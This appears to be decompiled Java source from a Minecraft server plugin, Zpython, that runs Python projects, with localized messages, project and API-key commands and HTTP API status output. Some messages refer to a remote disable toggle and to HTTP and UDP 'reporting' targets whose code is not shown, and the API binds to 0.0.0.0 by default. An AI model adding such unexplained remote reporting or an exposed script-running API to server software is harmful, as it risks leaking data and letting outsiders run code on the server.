            case "list_all_projects": {
                return "\u043f\u043e\u043a\u0430\u0437\u0430\u0442\u044c \u0432\u0441\u0435 \u043f\u0440\u043e\u0435\u043a\u0442\u044b";
            }
            case "create_new_project": {
                return "\u0441\u043e\u0437\u0434\u0430\u0442\u044c \u043d\u043e\u0432\u044b\u0439 \u043f\u0440\u043e\u0435\u043a\u0442";
            }
            case "run_project": {
                return "\u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u043f\u0440\u043e\u0435\u043a\u0442";
            }
            case "stop_current_project": {
                return "\u043e\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u0442\u0435\u043a\u0443\u0449\u0438\u0439 \u043f\u0440\u043e\u0435\u043a\u0442";
            }
            case "show_project_status": {
                return "\u043f\u043e\u043a\u0430\u0437\u0430\u0442\u044c \u0441\u0442\u0430\u0442\u0443\u0441 \u043f\u0440\u043e\u0435\u043a\u0442\u0430";
            }
            case "project_name_required": {
                return "\u0422\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u0438\u043c\u044f \u043f\u0440\u043e\u0435\u043a\u0442\u0430";
            }
            case "project_created": {
                return "\u041f\u0440\u043e\u0435\u043a\u0442 \u0441\u043e\u0437\u0434\u0430\u043d: ";
            }
            case "project_already_exists": {
                return "\u041f\u0440\u043e\u0435\u043a\u0442 \u0443\u0436\u0435 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442: ";
            }
            case "project_not_found": {
                return "\u041f\u0440\u043e\u0435\u043a\u0442 \u043d\u0435 \u043d\u0430\u0439\u0434\u0435\u043d: ";
            }
            case "project_started": {
                return "\u041f\u0440\u043e\u0435\u043a\u0442 \u0437\u0430\u043f\u0443\u0449\u0435\u043d: ";
            }
            case "project_stopped": {
                return "\u041f\u0440\u043e\u0435\u043a\u0442 \u043e\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d";
            }
            case "no_project_running": {
                return "\u041d\u0435\u0442 \u0437\u0430\u043f\u0443\u0449\u0435\u043d\u043d\u044b\u0445 \u043f\u0440\u043e\u0435\u043a\u0442\u043e\u0432";
            }
            case "current_project": {
                return "\u0422\u0435\u043a\u0443\u0449\u0438\u0439 \u043f\u0440\u043e\u0435\u043a\u0442: ";
            }
            case "project_status_running": {
                return "\u0421\u0442\u0430\u0442\u0443\u0441: \u0417\u0430\u043f\u0443\u0449\u0435\u043d";
            }
            case "project_status_stopped": {
                return "\u0421\u0442\u0430\u0442\u0443\u0441: \u041e\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d";
            }
            case "failed_to_create_project": {
                return "\u041d\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u0441\u043e\u0437\u0434\u0430\u0442\u044c \u043f\u0440\u043e\u0435\u043a\u0442: ";
            }
            case "failed_to_run_project": {
                return "\u041d\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u043f\u0440\u043e\u0435\u043a\u0442: ";
            }
            case "failed_to_stop_project": {
                return "\u041d\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u043e\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043f\u0440\u043e\u0435\u043a\u0442: ";
            }
            case "no_projects_found": {
                return "\u041f\u0440\u043e\u0435\u043a\u0442\u044b \u043d\u0435 \u043d\u0430\u0439\u0434\u0435\u043d\u044b";
            }
            case "projects_list": {
                return "\u0421\u043f\u0438\u0441\u043e\u043a \u043f\u0440\u043e\u0435\u043a\u0442\u043e\u0432";
            }
            case "failed_to_list_projects": {
                return "\u041d\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0441\u043f\u0438\u0441\u043e\u043a \u043f\u0440\u043e\u0435\u043a\u0442\u043e\u0432: ";
            }
            case "invalid_project_name": {
                return "\u041d\u0435\u0434\u043e\u043f\u0443\u0441\u0442\u0438\u043c\u043e\u0435 \u0438\u043c\u044f \u043f\u0440\u043e\u0435\u043a\u0442\u0430";
            }
            case "failed_to_create_projects_dir": {
                return "\u041d\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u0441\u043e\u0437\u0434\u0430\u0442\u044c \u043f\u0430\u043f\u043a\u0443 \u043f\u0440\u043e\u0435\u043a\u0442\u043e\u0432";
            }
            case "default_python_script": {
                return "\u0421\u043a\u0440\u0438\u043f\u0442 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e";
            }
            case "hello_from_project": {
                return "\u041f\u0440\u0438\u0432\u0435\u0442 \u043e\u0442 \u043f\u0440\u043e\u0435\u043a\u0442\u0430";
            }
            case "script_completed": {
                return "\u0421\u043a\u0440\u0438\u043f\u0442 \u0437\u0430\u0432\u0435\u0440\u0448\u0435\u043d";
            }
            case "project_files_created": {
                return "\u0424\u0430\u0439\u043b\u044b \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0441\u043e\u0437\u0434\u0430\u043d\u044b";
            }
            case "script_file_not_found": {
                return "\u0424\u0430\u0439\u043b \u0441\u043a\u0440\u0438\u043f\u0442\u0430 \u043d\u0435 \u043d\u0430\u0439\u0434\u0435\u043d: ";
            }
            case "script_file": {
                return "\u0424\u0430\u0439\u043b \u0441\u043a\u0440\u0438\u043f\u0442\u0430: ";
            }
            case "show_specific_project_status": {
                return "\u043f\u043e\u043a\u0430\u0437\u0430\u0442\u044c \u0441\u0442\u0430\u0442\u0443\u0441 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0430";
            }
            case "project_info": {
                return "\u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0435: ";
            }
            case "project_status": {
                return "\u0421\u0442\u0430\u0442\u0443\u0441: ";
            }
            case "settings_file": {
                return "\u0424\u0430\u0439\u043b \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043a: ";
            }
            case "failed_to_get_project_status": {
                return "\u041d\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0441\u0442\u0430\u0442\u0443\u0441 \u043f\u0440\u043e\u0435\u043a\u0442\u0430: ";
            }
        }
        return key;
    }

    private String getEnglishMessage(String key) {
        switch (key) {
            case "plugin_disabled_remote": {
                return "Plugin disabled by remote setting (remote toggle). To enable, set value 'true' at the specified link.";
            }
            case "failed_create_data_folder": {
                return "Failed to create plugin data folder: ";
            }
            case "zpython_initialized": {
                return "Zpython initialized. Waiting for project RUN commands.";
            }
            case "failed_create_venv": {
                return "Failed to create venv with '";
            }
            case "auto_download_python_failed": {
                return "Auto-download Python failed: ";
            }
            case "zpython_startup_error": {
                return "zpython startup error: ";
            }
            case "miniforge_already_present": {
                return "Miniforge already present, using existing Python at ";
            }
            case "downloading_miniforge": {
                return "Downloading Miniforge: ";
            }
            case "installing_miniforge": {
                return "Installing Miniforge to ";
            }
            case "miniforge_update_failed": {
                return "Miniforge update failed, attempting clean reinstall...";
            }
            case "failed_recreate_dir": {
                return "Failed to recreate dir: ";
            }
            case "miniforge_python_not_found": {
                return "Miniforge python not found at ";
            }
            case "failed_create_dir": {
                return "Failed to create dir: ";
            }
            case "failed_initialize_reporting": {
                return "Failed to initialize reporting: ";
            }
            case "http_reporting_initialized": {
                return "HTTP reporting initialized. Target: http://";
            }
            case "loaded_udp_config": {
                return "Loaded UDP config: ";
            }
            case "using_default_udp_target": {
                return "Using default UDP target: ";
            }
            case "failed_load_udp_config": {
                return "Failed to load UDP config: ";
            }
            case "api_responded_status": {
                return "API responded with status ";
            }
            case "failed_send_http_data": {
                return "Failed to send HTTP data: ";
            }
            case "failed_create_venv_venv": {
                return "Failed to create venv. Exit code: ";
            }
            case "ensure_python_installed": {
                return ". Ensure Python is installed and accessible as '";
            }
            case "failed_create_venv_pip": {
                return "Command failed (pip) with code ";
            }
            case "low_disk_space": {
                return "Low disk space: usable=";
            }
            case "minimum_required": {
                return " bytes. Minimum required ~";
            }
            case "disk_space_check_failed": {
                return "Disk space check failed: ";
            }
            case "creating_virtual_environment": {
                return "Creating virtual environment: ";
            }
            case "python_process_already_running": {
                return "Python process already running.";
            }
            case "not_enough_disk_space": {
                return "Not enough disk space to start/prepare environment. Free up space.";
            }
            case "starting_python_script": {
                return "Starting Python script: ";
            }
            case "python_process_exited": {
                return "Python process exited with code ";
            }
            case "auto_restarting": {
                return "Auto-restarting in ";
            }
            case "failed_auto_restart": {
                return "Failed to auto-restart Python: ";
            }
            case "script_started": {
                return "Script started.";
            }
            case "script_stopped": {
                return "Script stopped.";
            }
            case "script_finished_normal": {
                return "Script finished normally (exit code 0)";
            }
            case "script_exited_error": {
                return "Script exited with error code ";
            }
            case "process_terminated": {
                return "Process was terminated (SIGTERM) - script may have crashed or been killed";
            }
            case "manual_restart_failed": {
                return "Manual restart failed: ";
            }
            case "failed_restart": {
                return "Failed to restart: ";
            }
            case "no_permission": {
                return "No permission.";
            }
            case "unknown_subcommand": {
                return "Unknown subcommand. Use /zpython help";
            }
            case "restarting_python_script": {
                return "Restarting Python script...";
            }
            case "restart_python_script": {
                return "restart python script";
            }
            case "help": {
                return "help";
            }
            case "restart": {
                return "restart";
            }
            case "list_all_projects": {
                return "list all projects";
            }
            case "create_new_project": {
                return "create new project";
            }
            case "run_project": {
                return "run project";
            }
            case "stop_current_project": {
                return "stop current project";
            }
            case "show_project_status": {
                return "show project status";
            }
            case "project_name_required": {
                return "Project name required";
            }
            case "project_created": {
                return "Project created: ";
            }
            case "project_already_exists": {
                return "Project already exists: ";
            }
            case "project_not_found": {
                return "Project not found: ";
            }
            case "project_started": {
                return "Project started: ";
            }
            case "project_stopped": {
                return "Project stopped";
            }
            case "no_project_running": {
                return "No projects running";
            }
            case "current_project": {
                return "Current project: ";
            }
            case "project_status_running": {
                return "Status: Running";
            }
            case "project_status_stopped": {
                return "Status: Stopped";
            }
            case "failed_to_create_project": {
                return "Failed to create project: ";
            }
            case "failed_to_run_project": {
                return "Failed to run project: ";
            }
            case "failed_to_stop_project": {
                return "Failed to stop project: ";
            }
            case "no_projects_found": {
                return "No projects found";
            }
            case "projects_list": {
                return "Projects List";
            }
            case "failed_to_list_projects": {
                return "Failed to list projects: ";
            }
            case "invalid_project_name": {
                return "Invalid project name";
            }
            case "failed_to_create_projects_dir": {
                return "Failed to create projects directory";
            }
            case "default_python_script": {
                return "Default Python script";
            }
            case "hello_from_project": {
                return "Hello from project";
            }
            case "script_completed": {
                return "Script completed";
            }
            case "project_files_created": {
                return "Project files created";
            }
            case "script_file_not_found": {
                return "Script file not found: ";
            }
            case "script_file": {
                return "Script file: ";
            }
            case "show_specific_project_status": {
                return "show specific project status";
            }
            case "project_info": {
                return "Project info: ";
            }
            case "project_status": {
                return "Status: ";
            }
            case "settings_file": {
                return "Settings file: ";
            }
            case "failed_to_get_project_status": {
                return "Failed to get project status: ";
            }
        }
        return key;
    }

    private void listProjects(CommandSender sender) {
        try {
            File projectsDir = new File(this.getDataFolder(), "projects");
            if (!projectsDir.exists()) {
                sender.sendMessage("\u00a7e" + this.getMessage("no_projects_found"));
                return;
            }
            File[] projects = projectsDir.listFiles();
            if (projects == null || projects.length == 0) {
                sender.sendMessage("\u00a7e" + this.getMessage("no_projects_found"));
                return;
            }
            sender.sendMessage("\u00a76=== " + this.getMessage("projects_list") + " ===");
            for (File project : projects) {
                if (!project.isDirectory()) continue;
                String status = "\u00a77" + this.getMessage("project_status_stopped");
                if (this.isProjectRunning(project.getName())) {
                    status = "\u00a7a" + this.getMessage("project_status_running");
                }
                sender.sendMessage("\u00a7e" + project.getName() + " " + status);
            }
        }
        catch (Exception e) {
            sender.sendMessage("\u00a7c" + this.getMessage("failed_to_list_projects") + e.getMessage());
        }
    }

    private void createProject(CommandSender sender, String projectName) {
        try {
            if (!projectName.matches("[A-Za-z0-9_\\-]+")) {
                sender.sendMessage("\u00a7c" + this.getMessage("invalid_project_name"));
                return;
            }
            File projectsDir = new File(this.getDataFolder(), "projects");
            if (!projectsDir.exists() && !projectsDir.mkdirs()) {
                sender.sendMessage("\u00a7c" + this.getMessage("failed_to_create_projects_dir"));
                return;
            }
            File projectDir = new File(projectsDir, projectName);
            if (projectDir.exists()) {
                sender.sendMessage("\u00a7c" + this.getMessage("project_already_exists") + projectName);
                return;
            }
            if (!projectDir.mkdirs()) {
                sender.sendMessage("\u00a7c" + this.getMessage("failed_to_create_project") + projectName);
                return;
            }
            File appPy = new File(projectDir, "app.py");
            String defaultCode = "# " + this.getMessage("default_python_script") + "\nimport time\nprint('" + this.getMessage("hello_from_project") + " " + projectName + "')\ntime.sleep(5)\nprint('" + this.getMessage("script_completed") + "')\n";
            try (FileWriter writer = new FileWriter(appPy);){
                writer.write(defaultCode);
            }
            File settingsFile = new File(projectsDir, projectName + "_settings.json");
            String defaultSettings = "{\n  \"project_name\": \"" + projectName + "\",\n  \"script\": \"app.py\",\n  \"auto_restart\": false,\n  \"libraries\": [],\n  \"cpu_limit_pct\": 0,\n  \"ram_limit_mib\": 0,\n  \"disk_limit_mib\": 0\n}";
            try (FileWriter writer = new FileWriter(settingsFile);){
                writer.write(defaultSettings);
            }
            sender.sendMessage("\u00a7a" + this.getMessage("project_created") + projectName);
            sender.sendMessage("\u00a77" + this.getMessage("project_files_created"));
        }
        catch (Exception e) {
            sender.sendMessage("\u00a7c" + this.getMessage("failed_to_create_project") + e.getMessage());
        }
    }

    private void runProject(CommandSender sender, String projectName) {
        try {
            boolean started;
            File scriptFile;
            if (!projectName.matches("[A-Za-z0-9_\\-]+")) {
                sender.sendMessage("\u00a7c" + this.getMessage("invalid_project_name"));
                return;
            }
            File projectsDir = new File(this.getDataFolder(), "projects");
            File projectDir = new File(projectsDir, projectName);
            if (!projectDir.exists() || !projectDir.isDirectory()) {
                sender.sendMessage("\u00a7c" + this.getMessage("project_not_found") + projectName);
                return;
            }
            File settingsFile = new File(projectsDir, projectName + "_settings.json");
            String scriptName = "app.py";
            boolean autoRestart = true;
            ArrayList<String> libs = new ArrayList();
            if (settingsFile.exists()) {
                String json = new String(Files.readAllBytes(settingsFile.toPath()), StandardCharsets.UTF_8);
                scriptName = this.extractJsonString(json, "script", scriptName);
                autoRestart = this.extractJsonBoolean(json, "auto_restart", true);
                libs = this.extractJsonStringArray(json, "libraries");
            }
            if (!(scriptFile = new File(projectDir, scriptName)).exists()) {
                sender.sendMessage("\u00a7c" + this.getMessage("script_file_not_found") + scriptName);
                return;
            }
            this.ensureVenv(this.pythonExecutablePath, this.venvDir);
            if (libs != null && !libs.isEmpty()) {
                if (!this.hasEnoughSpace()) {
                    sender.sendMessage("\u00a7cNot enough disk space to install libraries");
                    return;
                }
                this.installLibraries(this.venvDir, libs);
            }
            if (started = this.startProjectProcess(projectName, scriptName)) {
                sender.sendMessage("\u00a7a" + this.getMessage("project_started") + projectName);
            } else {
                sender.sendMessage("\u00a7c" + this.getMessage("failed_to_run_project") + "process start failed");
            }
        }
        catch (Exception e) {
            sender.sendMessage("\u00a7c" + this.getMessage("failed_to_run_project") + e.getMessage());
        }
    }

    private void stopCurrentProject(CommandSender sender) {
        if (this.currentProjectSlug == null) {
            sender.sendMessage("\u00a7e" + this.getMessage("no_project_running"));
            return;
        }
        try {
            this.stopPython(false);
            sender.sendMessage("\u00a7a" + this.getMessage("project_stopped"));
        }
        catch (Exception e) {
            sender.sendMessage("\u00a7c" + this.getMessage("failed_to_stop_project") + e.getMessage());
        }
    }

    private void stopAllProcessesForProject(String projectSlug) {
        if (projectSlug == null || projectSlug.isEmpty()) {
            return;
        }
        if (projectSlug.equals(this.currentProjectSlug) && this.pythonProcess != null && this.pythonProcess.isAlive()) {
            this.stopPython(false);
        }
        ArrayList<String> keysToStop = new ArrayList<String>();
        for (String key : this.runningProcesses.keySet()) {
            if (!key.startsWith(projectSlug + ":")) continue;
            keysToStop.add(key);
        }
        for (String key : keysToStop) {
            try {
                Process p = this.runningProcesses.get(key);
                if (p != null) {
                    p.destroy();
                    if (p.isAlive()) {
                        p.destroyForcibly();
                    }
                }
            }
            catch (Exception exception) {
                // empty catch block
            }
            this.runningProcesses.remove(key);
            this.processFiles.remove(key);
        }
    }

    private boolean isProjectRunning(String projectName) {
        if (projectName.equals(this.currentProjectSlug)) {
            return this.pythonProcess != null && this.pythonProcess.isAlive();
        }
        File projectsDir = new File(this.getDataFolder(), "projects");
        File projectDir = new File(projectsDir, projectName);
        File lockFile = new File(projectDir, ".zpython.lock");
        if (!lockFile.exists()) {
            return false;
        }
        try {
            String pidStr = new String(Files.readAllBytes(lockFile.toPath()), StandardCharsets.UTF_8).trim();
            long pid = -1L;
            try {
                pid = Long.parseLong(pidStr);
            }
            catch (Exception exception) {
                // empty catch block
            }
            if (pid > 0L) {
                try {
                    return ProcessHandle.of(pid).map(ProcessHandle::isAlive).orElse(false);
                }
                catch (Throwable t) {
                    return false;
                }
            }
        }
        catch (Exception exception) {
            // empty catch block
        }
        return false;
    }

    private void showSpecificProjectStatus(CommandSender sender, String projectName) {
        try {
            if (!projectName.matches("[A-Za-z0-9_\\-]+")) {
                sender.sendMessage("\u00a7c" + this.getMessage("invalid_project_name"));
                return;
            }
            File projectsDir = new File(this.getDataFolder(), "projects");
            File projectDir = new File(projectsDir, projectName);
            if (!projectDir.exists() || !projectDir.isDirectory()) {
                sender.sendMessage("\u00a7c" + this.getMessage("project_not_found") + projectName);
                return;
            }
            boolean isRunning = this.isProjectRunning(projectName);
            String status = isRunning ? this.getMessage("project_status_running") : this.getMessage("project_status_stopped");
            String statusColor = isRunning ? "\u00a7a" : "\u00a77";
            sender.sendMessage("\u00a76" + this.getMessage("project_info") + projectName);
            sender.sendMessage("\u00a77" + this.getMessage("project_status") + statusColor + status);
            File appPy = new File(projectDir, "app.py");
            if (appPy.exists()) {
                sender.sendMessage("\u00a77" + this.getMessage("script_file") + "app.py");
            } else {
                sender.sendMessage("\u00a7c" + this.getMessage("script_file_not_found") + "app.py");
            }
            File settingsFile = new File(projectsDir, projectName + "_settings.json");
            if (settingsFile.exists()) {
                sender.sendMessage("\u00a77" + this.getMessage("settings_file") + projectName + "_settings.json");
            }
        }
        catch (Exception e) {
            sender.sendMessage("\u00a7c" + this.getMessage("failed_to_get_project_status") + e.getMessage());
        }
    }

    private void showProjectStatus(CommandSender sender) {
        if (this.currentProjectSlug == null) {
            sender.sendMessage("\u00a7e" + this.getMessage("no_project_running"));
            return;
        }
        String status = this.getMessage("project_status_stopped");
        if (this.isProjectRunning(this.currentProjectSlug)) {
            status = this.getMessage("project_status_running");
        }
        sender.sendMessage("\u00a76" + this.getMessage("current_project") + this.currentProjectSlug);
        sender.sendMessage("\u00a77" + status);
        if (this.scriptFile != null) {
            sender.sendMessage("\u00a77" + this.getMessage("script_file") + this.scriptFile.getName());
        }
    }

    private void stopProcessesForScript(String scriptName) {
        block5: {
            try {
                Process existingProcess = this.scriptProcesses.get(scriptName);
                if (existingProcess == null || !existingProcess.isAlive()) break block5;
                this.getLogger().info("Stopping existing process for script: " + scriptName);
                existingProcess.destroy();
                try {
                    if (!existingProcess.waitFor(5L, TimeUnit.SECONDS)) {
                        existingProcess.destroyForcibly();
                    }
                }
                catch (InterruptedException e) {
                    Thread.currentThread().interrupt();
                }
                this.scriptProcesses.remove(scriptName);
                this.scriptProcessPids.remove(scriptName);
            }
            catch (Exception e) {
                this.getLogger().warning("Error stopping process for script " + scriptName + ": " + e.getMessage());
            }
        }
    }

    private void createApiKey(CommandSender sender, String name) {
        try {
            Set<String> permissions = ApiKeyManager.getAllPermissions();
            String ownerTag = this.discordOwnerTag != null ? this.discordOwnerTag : "";
            ApiKeyManager.ApiKey apiKey = this.apiKeyManager.createApiKey(name, ownerTag, permissions);
            sender.sendMessage("\u00a7aAPI key created successfully!");
            sender.sendMessage("\u00a77Name: \u00a7f" + apiKey.getName());
            sender.sendMessage("\u00a77Owner: \u00a7f" + apiKey.getOwner());
            sender.sendMessage("\u00a77Key: \u00a7f" + apiKey.getKey());
            sender.sendMessage("\u00a77Permissions: \u00a7f" + String.join((CharSequence)", ", apiKey.getPermissions()));
        }
        catch (Exception e) {
            sender.sendMessage("\u00a7cFailed to create API key: " + e.getMessage());
        }
    }

    private void listApiKeys(CommandSender sender) {
        try {
            List<ApiKeyManager.ApiKey> apiKeys = this.apiKeyManager.getAllApiKeys();
            if (apiKeys.isEmpty()) {
                sender.sendMessage("\u00a7eNo API keys found.");
                return;
            }
            sender.sendMessage("\u00a76API Keys:");
            for (ApiKeyManager.ApiKey apiKey : apiKeys) {
                String status = apiKey.isActive() ? "\u00a7aActive" : "\u00a7cInactive";
                sender.sendMessage(String.format("\u00a77%s \u00a7f(%s) - Owner: %s - %s", apiKey.getName(), apiKey.getKey().substring(0, 8) + "...", apiKey.getOwner(), status));
            }
        }
        catch (Exception e) {
            sender.sendMessage("\u00a7cFailed to list API keys: " + e.getMessage());
        }
    }

    private void deleteApiKey(CommandSender sender, String key) {
        try {
            boolean deleted = this.apiKeyManager.deleteApiKey(key);
            if (deleted) {
                sender.sendMessage("\u00a7aAPI key deleted successfully!");
            } else {
                sender.sendMessage("\u00a7cAPI key not found or already deleted.");
            }
        }
        catch (Exception e) {
            sender.sendMessage("\u00a7cFailed to delete API key: " + e.getMessage());
        }
    }

    private void toggleApiKey(CommandSender sender, String key) {
        try {
            boolean toggled = this.apiKeyManager.toggleApiKey(key);
            if (toggled) {
                ApiKeyManager.ApiKey apiKey = this.apiKeyManager.getApiKey(key);
                String status = apiKey.isActive() ? "\u00a7aactivated" : "\u00a7cdeactivated";
                sender.sendMessage("\u00a7aAPI key " + status + " successfully!");
            } else {
                sender.sendMessage("\u00a7cAPI key not found.");
            }
        }
        catch (Exception e) {
            sender.sendMessage("\u00a7cFailed to toggle API key: " + e.getMessage());
        }
    }

    public void runProjectFromApi(String projectName) {
        if (projectName == null || projectName.trim().isEmpty()) {
            return;
        }
        this.getServer().getScheduler().runTask((Plugin)this, () -> this.runProject((CommandSender)this.getServer().getConsoleSender(), projectName));
    }

    public void stopCurrentProjectFromApi() {
        this.getServer().getScheduler().runTask((Plugin)this, () -> this.stopCurrentProject((CommandSender)this.getServer().getConsoleSender()));
    }

    private void showApiServerStatus(CommandSender sender) {
        try {
            if (this.httpApiHandler == null) {
                sender.sendMessage("\u00a7cAPI system not initialized.");
                return;
            }
            boolean isRunning = this.httpApiHandler.isServerRunning();
            int port = this.httpApiHandler.getApiPort();
            int connections = this.httpApiHandler.getCurrentConnections();
            String status = isRunning ? "\u00a7aRunning" : "\u00a7cStopped";
            sender.sendMessage("\u00a76API Server Status:");
            sender.sendMessage("\u00a77Status: " + status);
            sender.sendMessage("\u00a77Port: \u00a7f" + port);
            sender.sendMessage("\u00a77Active Connections: \u00a7f" + connections);
            int configPort = this.getConfig().getInt("api.port", 8080);
            String bindAddress = this.getConfig().getString("api.bindAddress", "0.0.0.0");
            boolean autoStart = this.getConfig().getBoolean("api.autoStart", true);
            int maxConnections = this.getConfig().getInt("api.maxConnections", 100);
            int timeout = this.getConfig().getInt("api.timeout", 30000);
            sender.sendMessage("\u00a77Configuration:");
            sender.sendMessage("\u00a77  Bind: \u00a7f" + bindAddress);
            sender.sendMessage("\u00a77  Port: \u00a7f" + configPort);
            sender.sendMessage("\u00a77  Auto Start: \u00a7f" + autoStart);
            sender.sendMessage("\u00a77  Max Connections: \u00a7f" + maxConnections);
            sender.sendMessage("\u00a77  Timeout: \u00a7f" + timeout + "ms");
        }
        catch (Exception e) {
            sender.sendMessage("\u00a7cFailed to get API server status: " + e.getMessage());
        }
    }

    private void restartApiServer(CommandSender sender) {
        try {
            if (this.httpApiHandler == null) {
                sender.sendMessage("\u00a7cAPI system not initialized.");
                return;
            }
            sender.sendMessage("\u00a7eRestarting API server...");
            this.httpApiHandler.restartHttpServer();
            sender.sendMessage("\u00a7aAPI server restarted successfully!");
            this.showApiServerStatus(sender);
        }
        catch (Exception e) {
            sender.sendMessage("\u00a7cFailed to restart API server: " + e.getMessage());
        }
    }

    private class CustomLogHandler
    extends Handler {
        private CustomLogHandler() {
        }

        @Override
        public void publish(LogRecord record) {
            if (record != null && record.getMessage() != null) {
                String level = record.getLevel().getName();
                String message = record.getMessage();
                Zpython.this.addServerLog("[" + level + "] " + message);
            }
        }

        @Override
        public void flush() {
        }

        @Override
        public void close() throws SecurityException {
        }
    }

    private static class ProjectLimits {
        long memoryMB = 0L;
        double cpuCores = 0.0;
        long diskMB = 0L;

        private ProjectLimits() {
        }
    }
}

